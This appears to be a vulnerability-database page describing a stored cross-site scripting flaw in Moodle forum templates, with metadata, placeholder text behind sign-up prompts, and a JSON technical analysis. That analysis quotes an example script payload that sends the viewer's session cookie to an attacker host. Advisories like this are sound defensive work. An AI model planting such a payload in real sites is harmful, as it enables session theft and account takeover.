Sceawere

Vulnerability Detail

CVE-2026-102581UPDATED Verified Sceawere Triage Sources: NVD / CISA KEV

Moodle Stored XSS Vulnerability

Vulnerability Metadata

Severity
Medium
Score / CVSS
4.6
Creation Date
3h ago
Vendor
—
Product
N/A
Attack Type
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Vector String
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Attack Complexity
LOW

Narrative and Response

Description

A flaw was found in Moodle. Insufficient output escaping in templates used to display forum posts enables a stored cross-site scripting (XSS) vulnerability. An attacker can inject malicious content into a forum post, which then executes arbitrary script code in the browser of another user viewing the affected post.

Executive Summary

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Executive Summary Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Technical Details

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Detailed Technical Analysis Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Mitigations

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Remediation & Mitigations Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

References

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.

Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Intelligence References Locked

Sign up to unlock professional threat analysis, mitigations, and indicator signatures.

Additional Metadata

{
  "score": "4.6",
  "pubDate": "2026-09-30T09:17:15.213Z",
  "pubdate": "2026-09-30T09:17:15.213Z",
  "executiveSummary": "This vulnerability is a stored cross-site scripting (XSS) flaw identified within the Moodle learning management system. The issue originates from insufficient output escaping within the templates responsible for rendering forum post content.\nThe vulnerability allows an authenticated attacker to inject and persist arbitrary JavaScript payloads within forum posts. When a victim—such as a student or administrator—views the compromised post, the injected script executes within the context of the victim's session.\nThe impact of this flaw is significant, as it enables session hijacking, unauthorized actions on behalf of the victim, and potential information disclosure. Because the payload is stored server-side, the attack does not require immediate user interaction beyond navigating to the affected forum thread. The risk is particularly high in environments where administrative users frequently review student discussions, potentially leading to unauthorized privilege escalation or full account takeover if session cookies are exfiltrated.\nSuccessful exploitation requires the attacker to have the ability to create or edit forum posts within the affected Moodle instance.",
  "technicalDetails": "The root cause of this vulnerability is improper sanitization and output encoding of user-supplied data within the Moodle forum module's template rendering engine. In Moodle, content generated by users is typically processed through a series of filters and sanitizers before being rendered in the browser. However, the templates specifically used for displaying forum posts fail to apply adequate output escaping, allowing malicious HTML and script tags to be processed by the browser as executable code rather than plain text.\nThe exploitation flow proceeds as follows: First, an attacker with sufficient permissions to post in a forum crafts a malicious payload containing JavaScript, such as '<script>fetch('https://attacker.com/steal?cookie='+document.cookie);</script>'. This payload is submitted as part of the post body. Moodle stores this content in the database without performing the necessary context-aware output encoding. Second, when a victim accesses the forum thread, the Moodle application fetches the malicious content from the database and inserts it directly into the Document Object Model (DOM) of the rendered page.\nBecause the templates lack strict contextual escaping, the browser interprets the injected tags as active content. The malicious script executes under the origin of the Moodle site, granting the script full access to the victim's Document object, including access to sensitive session cookies (if not protected by the HttpOnly flag), the ability to perform XMLHttpRequests or Fetch API calls to Moodle backend endpoints, and the capacity to manipulate the DOM to present deceptive content (phishing).\nThis vulnerability is persistent; the script remains in the database until the specific post is deleted or the malicious content is sanitized. The attack surface is limited to the forum module, but because these modules are often central to Moodle's functionality, they are frequently accessed by various user roles, including privileged administrators and instructors. The vulnerability does not rely on a specific browser but rather on the fundamental failure of the application to implement secure output handling, effectively bypassing client-side protection mechanisms that might otherwise block XSS attempts."
}
CVE-2026-102581: Moodle Stored XSS Vulnerability (MEDIUM Severity, CVSS: 4.6) | Sceawere